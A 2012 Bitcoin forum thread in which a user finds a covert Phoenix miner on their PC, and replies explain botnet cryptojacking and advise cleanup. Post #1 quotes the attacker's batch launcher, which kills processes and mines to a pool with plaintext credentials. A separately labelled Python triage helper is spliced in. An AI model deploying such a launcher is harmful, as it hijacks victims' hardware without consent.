Bitcoin Forum
Author Topic: Is this normal?  (Read 1178 times)
lostlegends
Newbie
Activity: 1
March 26, 2012, 11:11:14 PM
 #1

Hi,
Before tonight I didn't know what a bitcoin was or what a miner was, and to be honest I'm still not sure. Tonight, when I opened Task Manager to quit a buggy program, I noticed catalyst.exe running. I thought this was strange because Catalyst are ATI drivers and I use Nvidia graphics. So I looked in more depth and found phoenix.exe running from a drawer called folder1 on my HD. Also in that drawer was a .bat file with this text:
taskkill.exe /IM phoenix.exe /F
taskkill.exe /IM function3.exe /F
c:\folder1\3\phoenix.exe -u http://mlawson_miranda:miranda@eu.triplemining.com:8344 -k poclbm AGGRESSION=1 DEVICE=0
So I assume this phoenix was installed by another program, as I'm the only user of this PC, and I will find what installed it. But, as the subject heading says, is this normal for people doing this to try to hijack other people's PCs? Do I now need to keep a watch for these programs as well as viruses/malware/trojans etc.?
DeathAndTaxes
Donator
Legendary
Activity: 1218
Gerald Davis
March 27, 2012, 12:14:24 AM
 #2

It is normal for botnet operators to exploit unprotected systems. Doesn't really matter if it is bitcoin or sending mass penis enlargement spam.

If you didn't install that then you allowed your system to become compromised.

Nice find and obviously a script kiddie. What kind of idiot hijacks a computer and then uses a public pool with their account in plaintext?

I would contact triplemining.com.  Hopefully they ban that user and seize the funds.
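Added example, not part of the thread or written by any poster: a small triage helper for anyone preparing the report suggested above. It reads a script like the .bat file in post #1 and pulls out the pool host, port and account name to pass to the pool operator, without echoing the password. The function name `triage`, the report field names and the `SAMPLE_BAT` constant are hypothetical choices made for this example.

```python
import re
from urllib.parse import urlsplit

# Constructed sample: the three lines of the .bat file quoted in post #1.
SAMPLE_BAT = r"""taskkill.exe /IM phoenix.exe /F
taskkill.exe /IM function3.exe /F
c:\folder1\3\phoenix.exe -u http://mlawson_miranda:miranda@eu.triplemining.com:8344 -k poclbm AGGRESSION=1 DEVICE=0
"""

# Any scheme://... token on a command line.
URL_RE = re.compile(r"\b[a-z][a-z0-9+.-]*://\S+", re.IGNORECASE)
# taskkill ... /IM <image name>
KILL_RE = re.compile(r"\btaskkill(?:\.exe)?\b.*?/IM\s+(\S+)", re.IGNORECASE)


def triage(script_text):
    """Summarise what a launcher script kills and which account-bearing URLs it uses."""
    report = {"killed_images": [], "launches": []}
    for line in script_text.splitlines():
        line = line.strip()
        if not line:
            continue
        kill = KILL_RE.search(line)
        if kill:
            report["killed_images"].append(kill.group(1).lower())
            continue
        for match in URL_RE.finditer(line):
            url = urlsplit(match.group(0))
            if url.username is None:
                continue  # no account embedded in the URL, nothing to report
            exe = line.split()[0]
            image = exe.rsplit("\\", 1)[-1].lower()
            report["launches"].append({
                "executable": exe,
                "host": url.hostname,
                "port": url.port,
                "account": url.username,
                # Record only that a secret was present; never copy it into a report.
                "password_present": url.password is not None,
                # True when the script force-kills its own image name before launching.
                "kills_own_image_first": image in report["killed_images"],
            })
    return report


if __name__ == "__main__":
    for launch in triage(SAMPLE_BAT)["launches"]:
        print(launch)
```

The account name and pool host are the details a pool operator needs in order to act on a report; the executable path shows where to start looking on disk.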
jake262144
Full Member
Activity: 210
March 27, 2012, 12:16:27 AM
 #3

Answering your question, yes, it is perfectly normal for criminals to break into and exploit computer systems.
It is an unfortunate yet undeniable fact that there is a very strong economic incentive to employ hijacked machines for mining a non-traceable virtual currency such as Bitcoin - it offers higher rewards than simply sending out spam messages or performing DDoS attacks.

Phoenix is a legitimate miner but it was apparently being used covertly, without your consent.

For any attacker to have such control over your machine, it must have been seriously compromised.
This is a very dangerous situation because if the attacker has such control over your system he might as well record all your keystrokes and steal the login credentials to your e-mail, internet banking, eBay, or PayPal accounts.
I strongly suggest you perform a range of antivirus scans - you can use free online scanners(1) if you don't have one installed.

You need to get that system cleaned up ASAP. Better yet, back up valuable data, sanitize the hard drive and reinstall from scratch.
Always have up-to-date antivirus protection and install all the updates available for your OS.

Notes:
(1) there are links to three different scanners here.

EDIT: Evening, DAT. I see you've been quite prolific - are you perchance aiming for some undisclosed "Godlike member" title?
Mysil2
Newbie
Activity: 15
March 27, 2012, 12:33:07 AM
 #4

Also if you have got a keylogger installed like jake262144 warned about, be sure to change your passwords (not on the unclean computer, though)!

1BLUeBirdV2RBnyJBQZvNXsCMm3VVqoPTj
stevegee58
Hero Member
Activity: 783
March 27, 2012, 12:37:44 AM
 #5

Guys, these things don't install themselves onto your computer. You had to have clicked something to bring it in.

Most computer viruses (like biological ones) are caught by engaging in unsafe practices and are completely avoidable.

You are in a maze of twisty little passages, all alike.